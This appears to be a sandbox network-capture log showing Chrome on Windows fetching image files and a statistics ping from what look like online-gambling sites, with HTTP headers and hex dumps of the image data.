                                                                                                                                                          2024-06-09 22:40:54 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          140192.168.2.54987543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC361OUTGET /cc.png?r=8877277658 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC341INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14727519733310810700
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          141192.168.2.549884163.181.131.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC561OUTGET /ocs/cc.png?1717972852372 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC398INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache13.l2hk2[5,0], ens-cache3.de7[221,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b5839717179728550255219e
                                                                                                                                                          2024-06-09 22:40:55 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          142192.168.2.54988790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC635OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE7[431],EU-GER-frankfurt-GLOBAL1-CACHE7[410,TCP_MISS,430],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: af2e0d66b78dfd1e9c10957f035d58fa
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814483
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:55 UTC3882INData Raw: 30 61 d6 97 35 ad 94 f8 4e cb 32 67 22 47 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4
                                                                                                                                                          Data Ascii: 0a5N2g"Gl#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          143192.168.2.54988990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC639OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE9[567],EU-GER-frankfurt-GLOBAL1-CACHE8[552,TCP_MISS,565],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 569ad66eebbc2e090d985537f3cade0e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814483
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:55 UTC2126INData Raw: 11 a3 48 9d 1d b6 34 2e ec fa e7 a7 b7 99 e3 23 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8
                                                                                                                                                          Data Ascii: H4.#:K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          144192.168.2.54988890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC635OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[372],EU-GER-frankfurt-GLOBAL1-CACHE12[365,TCP_MISS,369],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 756295e07bbe60df49899a323bcd1eb8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          145192.168.2.549886202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC363OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: wns732.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:55 UTC356INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:55 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          146192.168.2.549885103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC424OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:55 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:40:55 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 30 3a 35 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          2024-06-09 22:40:55 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:40:55 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:55 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:55 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 35 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 5
                                                                                                                                                          2024-06-09 22:40:55 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:55 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:40:55 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          147192.168.2.54989090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC635OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
